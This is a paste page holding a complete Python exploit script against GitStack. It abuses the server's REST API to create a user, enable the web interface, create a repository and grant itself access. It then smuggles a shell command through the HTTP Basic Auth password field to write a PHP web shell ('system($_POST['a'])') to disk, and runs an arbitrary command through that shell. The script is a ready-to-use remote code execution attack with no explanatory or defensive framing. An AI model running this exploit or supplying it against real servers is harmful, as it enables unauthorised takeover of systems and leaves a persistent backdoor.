SHOW:
|
|
- or go back to the newest paste.
| 1 | import requests | |
| 2 | from requests.auth import HTTPBasicAuth | |
| 3 | import os | |
| 4 | import sys | |
| 5 | from time import sleep | |
| 6 | ||
| 7 | ip = "localhost:8000" | |
| 8 | ||
| 9 | # What command you want to execute | |
| 10 | command = 'whoami' | |
| 11 | ||
| 12 | repository = 'rce' | |
| 13 | username = 'rce' | |
| 14 | password = 'rce' | |
| 15 | csrf_token = 'token' | |
| 16 | ||
| 17 | user_list = [] | |
| 18 | ||
| 19 | print ("[+] Get user list")
| |
| 20 | try: | |
| 21 | r = requests.get("http://{}/rest/user/".format(ip))
| |
| 22 | user_list = r.json() | |
| 23 | user_list.remove('everyone')
| |
| 24 | except: | |
| 25 | pass | |
| 26 | ||
| 27 | if len(user_list) > 0: | |
| 28 | username = user_list[0] | |
| 29 | print ("[+] Found user {}".format(username))
| |
| 30 | else: | |
| 31 | r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password})
| |
| 32 | print ("[+] Create user")
| |
| 33 | ||
| 34 | if not "User created" in r.text and not "User already exist" in r.text: | |
| 35 | print ("[-] Cannot create user")
| |
| 36 | os._exit(0) | |
| 37 | sleep(3) | |
| 38 | r = requests.get("http://{}/rest/settings/general/webinterface/".format(ip))
| |
| 39 | if "true" in r.text: | |
| 40 | print ("[+] Web repository already enabled")
| |
| 41 | else: | |
| 42 | print ("[+] Enable web repository")
| |
| 43 | r = requests.put("http://{}/rest/settings/general/webinterface/".format(ip), data='{"enabled" : "true"}')
| |
| 44 | if not "Web interface successfully enabled" in r.text: | |
| 45 | print ("[-] Cannot enable web interface")
| |
| 46 | os._exit(0) | |
| 47 | sleep(3) | |
| 48 | print ("[+] Get repositories list")
| |
| 49 | r = requests.get("http://{}/rest/repository/".format(ip))
| |
| 50 | repository_list = r.json() | |
| 51 | ||
| 52 | if len(repository_list) > 0: | |
| 53 | repository = repository_list[0]['name'] | |
| 54 | print ("[+] Found repository {}".format(repository))
| |
| 55 | else: | |
| 56 | print ("[+] Create repository")
| |
| 57 | ||
| 58 | r = requests.post("http://{}/rest/repository/".format(ip), cookies={'csrftoken' : csrf_token}, data={'name' : repository, 'csrfmiddlewaretoken' : csrf_token})
| |
| 59 | if not "The repository has been successfully created" in r.text and not "Repository already exist" in r.text: | |
| 60 | print ("[-] Cannot create repository")
| |
| 61 | os._exit(0) | |
| 62 | sleep(3) | |
| 63 | print ("[+] Add user to repository")
| |
| 64 | r = requests.post("http://{}/rest/repository/{}/user/{}/".format(ip, repository, username))
| |
| 65 | ||
| 66 | if not "added to" in r.text and not "has already" in r.text: | |
| 67 | print ("[-] Cannot add user to repository")
| |
| 68 | os._exit(0) | |
| 69 | ||
| 70 | print ("[+] Disable access for anyone")
| |
| 71 | r = requests.delete("http://{}/rest/repository/{}/user/{}/".format(ip, repository, "everyone"))
| |
| 72 | ||
| 73 | if not "everyone removed from rce" in r.text and not "not in list" in r.text: | |
| 74 | print ("[-] Cannot remove access for anyone")
| |
| 75 | os._exit(0) | |
| 76 | sleep(3) | |
| 77 | print ("[+] Create backdoor in PHP")
| |
| 78 | r = requests.get('http://{}/web/index.php?p={}.git&a=summary'.format(ip, repository), auth=HTTPBasicAuth(username, 'p && echo "<?php system($_POST[\'a\']); ?>" > c:\GitStack\gitphp\exploit-saltinbank.php'))
| |
| 79 | print (r.text.encode(sys.stdout.encoding, errors='replace')) | |
| 80 | sleep(3) | |
| 81 | print ("[+] Execute command")
| |
| 82 | r = requests.post("http://{}/web/exploit-saltinbank.php".format(ip), data={'a' : command})
| |
| 83 | print (r.text.encode(sys.stdout.encoding, errors='replace')) |
